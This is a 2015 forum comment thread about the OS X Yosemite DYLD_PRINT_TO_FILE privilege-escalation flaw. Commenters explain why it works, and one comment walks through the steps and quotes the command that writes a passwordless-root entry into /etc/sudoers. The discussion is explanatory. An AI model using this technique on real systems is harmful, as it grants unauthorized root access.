at this point I'm not sure what happens exactly. One possibility is the obvious which is that what we write to file descitor 3 goes into the file represent file descriptor 3. that's simple if that's what bash would do. However the explanation of the exploit notes that DYLD_ also fails to close it's file descriptors. In which case what happens is that the newgrp command just exits but because the pipe made it a child, it's parent inherits the dangling filedesciptor. and then that's why we can write to that. I really don't know my bash well enough to say which of those might be the right mechanism here. if either.
anyone alse want to explain?
Another point I'm fuzzy on here is whether the writer needs to have the same setuid as the reader.

--
Some drink at the fountain of knowledge. Others just gargle.
1. Re:I still don't understand by DaphneDiane · 2015-07-23 09:53 · Score: 1
  
  newgrp doesn't exit it but executes a child shell which replaces the newgrp process. It's within shell that has access to file descriptor 3.
  For why the file needs to have the same setuid is that is what the exploit takes advantage of, normally writing to a setuid file clears the setuid bit, but that doesn't happen if the writer is already root. Which means that using the exploit ( and some tricks to get out of append mode ) someone can turn a setuid file into any program that will run as root when it is launched.
2. Re:I still don't understand by goombah99 · 2015-07-23 10:52 · Score: 1
  
  setuid is for executables. /etc/sudoers is root owned/readable but it's not executable, so there's no set UID on this file. I think the exploit you are describing is acutally another clever way to achieve a root priv escalation. using sudoers is more direct but also perhaps easier to detect.
  
  --
  Some drink at the fountain of knowledge. Others just gargle.
Re:Didn't upgrade to Yosemite, yay! by Culture20 · 2015-07-23 10:48 · Score: 1

From TFA

"This flaw is present in the latest version of Yosemite, OS X 10.10.4, and the beta, version 10.10.5. If you upgrade to the El Capitan beta (OS X 10.11), you'll be free from the vulnerability as Apple has already fixed it in that preview beta. Once again, if you keep up with Cupertino and install (or buy) the very latest stuff, you'll be rewarded."

lolwhat? That statement is ridiculous. Since when unstable beta is considered keeping up with updates. Well unless "rewarded" is meant as synonym to pwned.
Because there's never security holes in beta software...

Agreed, that statement from TFA is pretty stupid.
The ridiculous part isn't the security holes in beta software. It's that the article assumes beta software is "the latest updates" or that you can get it pre-installed when you buy the latest hardware.
Re: But can it be a Tweet? by MSG · 2015-07-23 12:00 · Score: 3, Informative

When you run the example exploit command (simplified):
Your shell sets the DYLD_PRINT_TO_FILE variable.
Your shell executes newgrp. newgrp is SUID root.
As newgrp is initializing, the dynamic linker opens the value of DYLD_PRINT_TO_FILE (/etc/sudoers) for debug log output. It should check whether it is executing in a SUID context, but doesn't. It should also set the close-on-exec flag for that file, but it doesn't do that either. The log file is now file descriptor 3.
newgrp sets its uid and gids as appropriate for the calling user, and then starts a new shell. Because the close-on-exec flag wasn't set, the new shell still has /etc/sudoers open as file descriptor 3.
The new shell reads commands from stdin. In this case, it gets "echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3".
There is no more input, and the shell exits.
Your shell runs sudo. The sudoers file has been modified, and now says that you have the right to run all commands without being prompted for a password.
You get a root shell.
Re:Macs don't get viruses by JustAnotherOldGuy · 2015-07-23 14:49 · Score: 1

Whoooosh!

--
Just cruising through this digital world at 33 1/3 rpm...